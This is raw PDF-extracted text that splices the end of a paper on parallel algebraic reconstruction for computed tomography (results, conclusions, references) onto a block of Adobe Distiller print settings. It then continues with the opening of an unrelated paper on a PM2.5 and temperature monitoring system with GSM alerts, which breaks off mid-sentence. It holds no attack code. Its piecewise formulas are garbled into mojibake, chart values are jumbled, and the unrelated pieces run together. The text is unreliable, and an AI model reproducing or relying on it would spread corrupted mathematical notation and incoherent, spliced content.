f1, which according to the formula (8) takes the form f1ðx; yÞ ¼ 1; ðx; yÞ 2 ½�0:7; �0:4 � ½�0:5; 0:2 2; ðx; yÞ 2 ½�0:2; 0:2 � ½�0:1; 0:1 3; ðx; yÞ 2 ½�0:2; 0:2 � ½0:3; 0:5 4; ðx; yÞ 2 ½0:4; 0:7 � ½0:4; 0:7 0; otherwise: 8>>>>< >>>>: Figure 7 presents the reconstruction of function f1 for n = 40, m = 50, λ = 1.5 and 3 threads. Figure 8 presents the error Δ (see (9)) of this reconstruction. The second presented function of the density distribution will be the function f2, which according to the formula (8) takes the form f2ðx; yÞ ¼ 1; ðx; yÞ 2 ½0; 0:5 � ½0:3; 0:5 2; ðx; yÞ 2 ½�0:4; 0 � ½�0:6; 0:7 3; ðx; yÞ 2 ½�0:6; �0:4 � ½�0:1; 0:1 4; ðx; yÞ 2 ½0; 0:3 � ½�0:5; �0:3 0; otherwise 8>>>>< >>>>: Figure 9 presents the reconstruction of function f2 for n = 60, m = 80, λ = 1.5 and 8 threads. Figure 10 presents the error Δ (see (9)) of this reconstruction. Figure 7 Reconstructed function f1(x,y) for n = 40, m = 50, λ = 1.5 and 3 threads. Full-size DOI: 10.7717/peerj-cs.339/fig-7 Table 2 Optimal values of the λ parameter for the step s = 0.1 and for the step s = 0.01. s ↓ th → 1 2 3 4 5 6 7 8 9 10 0.1 1.5 1.5 1.6 1.6 1.5 1.5 1.5 1.5 1.5 1.6 0.01 1.41 1.41 1.56 1.55 1.53 1.44 1.50 1.50 1.56 1.62 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 13/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-7 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ In the next figures (Figs. 11 and 12) we demonstrate, for selected examples, the correctness of behavior of the reconstruction parameters, that is, more precisely, the number of iterations required to obtain the given error Δ depending on the number of blocks, together with the time needed to execute 1,000 iterations depending on the number of blocks. Figure 8 The error Δ of the reconstruction of the function f1(x,y) for n = 40, m = 50, λ = 1.5 and 3 threads. Full-size DOI: 10.7717/peerj-cs.339/fig-8 Figure 9 Reconstructed function f2(x,y) for n = 60, m = 80, λ = 1.5 and 8 threads. Full-size DOI: 10.7717/peerj-cs.339/fig-9 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 14/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-8 http://dx.doi.org/10.7717/peerj-cs.339/fig-9 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ Computer programs, realizing the presented research, were written in the following languages: C# from Visual Studio 2017 and Mathematica 12. The study was conducted with the aid of computer with Windows 7 Professional system, equipped with 16 GB RAM, processor Intel Core i7 3.2 GHz (12 threads). It is also worth to mention that the largest considered systems of equations possessed 160,000 unknown elements (n = 400) and were composed from 359,998 equations (m = 600) and the data concerning the coefficients of such systems used more that 6 GB of disk space. Figure 10 The error Δ of the reconstruction of the function f2(x,y) for n = 60, m = 80, λ = 1.5 and 8 threads. Full-size DOI: 10.7717/peerj-cs.339/fig-10 6483 4503 5865 5183 3959 3265 2606 2076 1418 764 Figure 11 The number of iterations (iter.) needed to get the error Δ < 0.1 depending on the number of blocks, n = 100, m = 150, λ = 1, f1(x,y). Full-size DOI: 10.7717/peerj-cs.339/fig-11 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 15/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-10 http://dx.doi.org/10.7717/peerj-cs.339/fig-11 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ CONCLUSIONS The conducted investigations, presented in this article, show that the introduced PB algorithm is useful, also in practice. For the assumed resolution one can select, with big precision, the values of other reconstruction parameters, in order to minimize the required calculations, however, the selection of optimal values of the reproduction parameters is of a different nature than in the classical task. Dividing matrix A of equation system (1) into blocks, the information about the examined object is poorer in each block (in comparison with information delivered by the full matrix A), therefore the number of iterations increases with the number of blocks. Research has shown that this increase is linear. If we refer to the number of iterations for one thread, then as the number of blocks increases, the number of iterations increases, and the increase is approximately 0.835 the number of iterations for one thread (this is shown in Fig. 7, but for other cases it is similar). The application of bigger number of threads reduces significantly the time needed to execute the iterations. In the initial phase, increasing the number of threads reduces the execution time of 1,000 iterations. On average, the execution time for 1,000 iterations on n threads is approximately 76.39% of the execution time for 1,000 iterations on n − 1 threads. Then (from 6 threads) this percentage drops significantly (the reason is a much smaller amount of information that individual blocks have). In future there are planned the further tests for optimizing the reconstruction parameters in order to develop the biggest possible advantage of PB algorithm, and other algorithms using the parallel calculations, over the sequential algorithm. The current paper gives the basis for this planned research. ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. 16.786 15.491 37.877 45.1 58.703 17.59719.534 18.34519.578 30.576 Figure 12 Execution time 1,000 iterations (iter.) depending on the number of blocks, n = 100, m = 150, λ = 1, f1(x,y). Full-size DOI: 10.7717/peerj-cs.339/fig-12 Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 16/19 http://dx.doi.org/10.7717/peerj-cs.339/fig-12 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ Competing Interests The author declares that they have no competing interests. Author Contributions � Mariusz Pleszczyński conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The program codes are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.339#supplemental-information. REFERENCES Andersen A. 1989. Algebraic reconstruction in CT from limited views. IEEE Transactions in Medical Imaging 8(1):50–55 DOI 10.1109/42.20361. Andersen A, Kak A. 1984. Simultaneous algebraic reconstruction technique (SART): a superior implementation of the art algorithm. Ultrasonic Imaging 6(1):81–94 DOI 10.1177/016173468400600107. Averbuch A, Shkolnisky Y. 2003. 3D Fourier based discrete radon transform. Applied and Computational Harmonic Analysis 15(1):33–69 DOI 10.1016/S1063-5203(03)00030-7. Censor Y, Elfving T, Herman G, Nikazad T. 2008. On diagonally relaxed orthogonal projection methods. SIAM Journal on Scientific Computing 30(1):473–504 DOI 10.1137/050639399. Cozzolino M, Gentile V, Mauriello P, Peditrou A. 2020. Non-destructive techniques for building evaluation in urban areas: the case study of the redesigning project of Eleftheria square (Nicosia, Cyprus). Applied Sciences 10(12):4296 DOI 10.3390/app10124296. Donegani M, Ferrarazzo G, Marra S, Miceli A, Raffa S, Bauckneht M, Morbelli S. 2020. Positron emission tomography-based response to target and immunotherapies in oncology. Medicina 56(8):373 DOI 10.3390/medicina56080373. Drummond L, Duff I, Guivarch R, Ruiz D, Zenadi M. 2015. Partitioning strategies for the block cimmino algorithm. Journal of Engineering Mathematics 93(1):21–39 DOI 10.1007/s10665-014-9699-0. Elfving T, Nikazad T. 2009. Properties of a class of block-iterative methods. Inverse Problems 25(11):115011 DOI 10.1088/0266-5611/25/11/115011. Gilbert P. 1972. Iterative methods for the three-dimensional reconstruction of an object from projections. Journal of Theoretical Biology 36(1):105–117 DOI 10.1016/0022-5193(72)90180-4. Gong L, Nie L, Xu Y. 2020. Geometrical and topological analysis of pore space in sandstones based on x-ray computed tomography. Energies 13(15):3774 DOI 10.3390/en13153774. Gordon D, Gordon R. 2005. Component-averaged row projections: a robust, block-parallel scheme for sparse linear systems. SIAM Journal on Scientific Computing 27(3):1092–1117 DOI 10.1137/040609458. Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 17/19 http://dx.doi.org/10.7717/peerj-cs.339#supplemental-information http://dx.doi.org/10.7717/peerj-cs.339#supplemental-information http://dx.doi.org/10.7717/peerj-cs.339#supplemental-information http://dx.doi.org/10.1109/42.20361 http://dx.doi.org/10.1177/016173468400600107 http://dx.doi.org/10.1016/S1063-5203(03)00030-7 http://dx.doi.org/10.1137/050639399 http://dx.doi.org/10.3390/app10124296 http://dx.doi.org/10.3390/medicina56080373 http://dx.doi.org/10.1007/s10665-014-9699-0 http://dx.doi.org/10.1088/0266-5611/25/11/115011 http://dx.doi.org/10.1016/0022-5193(72)90180-4 http://dx.doi.org/10.3390/en13153774 http://dx.doi.org/10.1137/040609458 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ Gordon R, Bender R, Herman G. 1970. Algebraic reconstruction techniques (art) for three- dimensional electron microscopy and x-ray photography. Journal of Theoretical Biology 29(3):471–481 DOI 10.1016/0022-5193(70)90109-8. Guan H, Gordon R. 1996. Computed tomography using algebraic reconstruction techniques with different projection access schemes: a comparison study under practical situation. Physics in Medicine and Biology 41(9):1727–1743 DOI 10.1088/0031-9155/41/9/012. Herman G. 1975. A relaxation method for reconstructing objects from noisy x-rays. Mathematical Programming 8(1):1–19 DOI 10.1007/BF01580425. Hetmaniok E, Ludew J, Pleszczyński M. 2017. Examination of stability of the computer tomography algorithms in case of the incomplete information for the objects with non- transparent elements. In: Wituła R, Bajorska-Harapińska B, Hetmaniok E, Słota D, Trawiński T, eds. Selected Problems on Experimental Mathematics. Gliwice: Silesian University of Technology Press, 39–59. Hounsfield G. 1972. A method of and apparatus for examination of a body by radiation such as x- ray or gamma radiation. Patent Specification 1283915. The Patent Office. Jiang M, Wang G. 2003. Convergence studies on iterative algorithms for image reconstruction. IEEE Transactions on Medical Imaging 22(5):569–579 DOI 10.1109/TMI.2003.812253. Kaczmarz S. 1937. Angenäherte auflösung von systemen lineare gleichungen. International Academy of Political Science Letter 15:355–357. Kamath G, Shi L, Song W-Z, Lees J. 2016. Distributed travel-time seismic tomography in large-scale sensor networks. Journal of Parallel and Distributed Computing 89(3–4):50–64 DOI 10.1016/j.jpdc.2015.12.002. Lewitt R. 1983. Reconstruction algorithms: transform methods. Proceedings of the IEEE 71(3):390–408 DOI 10.1109/PROC.1983.12597. Louis A. 1984a. Nonuniqueness in inverse radon problems: the frequency distribution of the ghosts. Mathematische Zeitschrift 185(3):429–440 DOI 10.1007/BF01215050. Louis A. 1984b. Orthogonal function series expansions and the null space of the radon transform. SIAM Journal of Mathematical Analysis 15(3):2346–2349 DOI 10.1137/0515047. Malczewski K. 2020. Image resolution enhancement of highly compressively sensed CT/PET signals. Algorithms 13(5):129 DOI 10.3390/a13050129. Natterer F. 1986. The mathematics of computerized tomography. Hoboken: Wiley. Radon J. 1917. Über die bestimmung von funktionen durch ihre integalwerte längs gewisser mannigfaltigkeiten. Berichte Sächsische Akademie der Wissenschaften 69:262–267. Sørensen H, Hansen P. 2014. Multicore performance of block algebraic iterative reconstruction methods. SIAM Journal on Scientific Computing 36(5):524–546 DOI 10.1137/130920642. Tanabe K. 1971. Projection method for solving a singular system of linear equations and its applications. Numerische Mathematik 17(3):203–214 DOI 10.1007/BF01436376. Torun F, Manguoglu M, Aykanat C. 2018. A novel partitioning method for accelerating the block cimmino algorithm. SIAM Journal on Scientific Computing 6(6):827–850 DOI 10.1137/18M1166407. Trummer M. 1984. A note on the art of relaxation. Computing 33(3–4):349–352 DOI 10.1007/BF02242277. Verhoeven D. 1993. Multiplicative algebraic computed tomography algorithms for the reconstruction of multidirectional interferometric data. Optical Engineering 32(2):410–419 DOI 10.1117/12.60852. Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 18/19 http://dx.doi.org/10.1016/0022-5193(70)90109-8 http://dx.doi.org/10.1088/0031-9155/41/9/012 http://dx.doi.org/10.1007/BF01580425 http://dx.doi.org/10.1109/TMI.2003.812253 http://dx.doi.org/10.1016/j.jpdc.2015.12.002 http://dx.doi.org/10.1109/PROC.1983.12597 http://dx.doi.org/10.1007/BF01215050 http://dx.doi.org/10.1137/0515047 http://dx.doi.org/10.3390/a13050129 http://dx.doi.org/10.1137/130920642 http://dx.doi.org/10.1007/BF01436376 http://dx.doi.org/10.1137/18M1166407 http://dx.doi.org/10.1007/BF02242277 http://dx.doi.org/10.1117/12.60852 http://dx.doi.org/10.7717/peerj-cs.339 https://peerj.com/computer-science/ Waldén J. 2000. Analysis of the direct Fourier method for computer tomography. IEEE Transactions in Medical Imaging 19(3):211–222 DOI 10.1109/42.845179. Yao Y, Liu C, Xu C. 2020. A new GNSS-derived water vapor tomography method based on optimized voxel for large GNSS network. Remote Sens 12(14):2306 DOI 10.3390/rs12142306. Zhang Z, Sameh A. 2018. Block row projection method based on m-matrix splitting. Journal of Computational and Applied Mathematics 340(2):731–744 DOI 10.1016/j.cam.2017.08.015. Pleszczyński (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.339 19/19 http://dx.doi.org/10.1109/42.845179 http://dx.doi.org/10.3390/rs12142306 http://dx.doi.org/10.1016/j.cam.2017.08.015 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.339 Implementation of the computer tomography parallel algorithms with the incomplete set of data Introduction Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_m3ktnhp6ojf3fkul4nelspot4a ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 71 The Monitoring and Wireless Transmission System of PM2.5 in the Scenic Wang Xiaohui School of Leisure Management Xi’an eurasia University Xi’an, China e-mail: wangxiaohui@eurasia.edu Lei Kewei School of Leisure Management Xi’an eurasia University Xi’an, China e-mail: leikewei@eurasia.edu Abstract—This Scenic area has large traffic volume and complex environment and some scenic areas need to be protected. So developing an air quality monitoring system is very important. In this paper, the temperature sensor, the PM2.5 sensor and the wireless transmission module were combined by the MCU. It monitors the spot in PM2.5 concentration and the temperature information. When the PM2.5 concentration is higher than the threshold, the wireless transmission module sends the warning signal. So the system could measure and improve the environment of scenic spot. Keywords-PM2.5 Sensor; Dust Monitoring; Temperature Sensor; SIM900A I. INTRODUCTION With the rapid development of the industrial level, the air quality in daily life is getting worse. Especially when the people are densely poured into the scenic area, the ambient air quality is even worse[1]. Therefore, how to effectively collect the PM2.5 in the scenic core area and transmit data in time is a difficult problem to be solved[2]. In recent years, the minimum system is used in the dust monitoring with the advantages of small size, powerful function and the low cost[3]. So the application of the PM2.5 sensor and the wireless transmission system based on 89C51 board can ensure the physical and mental safety in the scenic area for the tourists. II. ANALYSIS OF THE SYSTEM ARCHITECTURE A. System hardware architecture The system based on 89C51 single chip is composed of the data acquisition module, the key circuit, the alarm module and the GSM wireless transmission module. The structure of the system is shown in Figure 1. As shown in Figure 1, the system can collect the PM2.5 and the temperature data in a certain area through the dust particle sensor and the temperature sensor. Because the analog signal could not processed by the MCU, so using DS1820 AD conversion module to convert the analog signal to the digital signal and then transmit the data to the MCU and displayed on the LCD screen. At the same time, the MCU compares the collected data with the threshold, if the collected value is higher than the threshold, the buzzer will alarm and send the PM2.5 concentration and the current temperature information to the user with the short message[4]. STC89C51 ( MCU) Dust particle sensor A/ D conversion ( AD0832) GSM SMS sending module mobile phone LCD c ircuit 18B 20 temperature sensor Key c ircuit Alarm module ( buzzer) Digital signal Analog signal Analog signal Collection of information Alarm instruction Figure 1. System structure diagram B. PM2.5dust sensor module The selection of the PM2.5 dust sensor affects the range and precision of the monitoring module directly. GP2Y1010AU0F dust concentration sensor was used in this paper. From Table 1, the working voltage of the dust concentration sensor module is the same with the single chip. Its high accuracy meets the requirements of the majority of users. The large temperature range can be applied to all kinds of bad environment. In general, more than 120mg/m3 of PM2.5 can cause harm to the human body, so this module's range is sufficient. TABLE 1. CHARACTERISTICS OF DUST CONCENTRATION SENSOR Characteristic Input Voltage (V) Current(mA) Precision(µm) Index 4.98~5.02 < 20 0.8 Characteristic Working temperature(℃) Range(mg/m 3 ) sensitivity Index -10~+65 0~0.8 0.5V/0.1mg Dust sensor is used to measure the dust concentration in the air by the reflection principle of dust. The internal structure of the dust concentration sensor is shown in Figure 2. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 72 Amplifier Circuit case PD V-LED RSDust or Smoke particle Dust through .hole 1 3 2 5 6 4 LED-GND S-GND Vo VCC LED IRED Figure 2. The structure of the dust concentration sensor TABLE 2. DUST SENSOR PIN PIN 1 2 3 4 5 6 Description 5V GND Pulse GND Output Voltage 5V Function Control the receiving PD Control the sending IRED The function and pin of the dust sensor is shown in Table 2. With the received pulse signal and the output voltage signal from the single chip, the dust sensor controls the receiving device PD (photo detector). The sending device IRED (infrared light emitting diode) feeds the MCU with the dust concentration in the form of voltage. There are two transistors IRED and PD inside the dust sensor. The 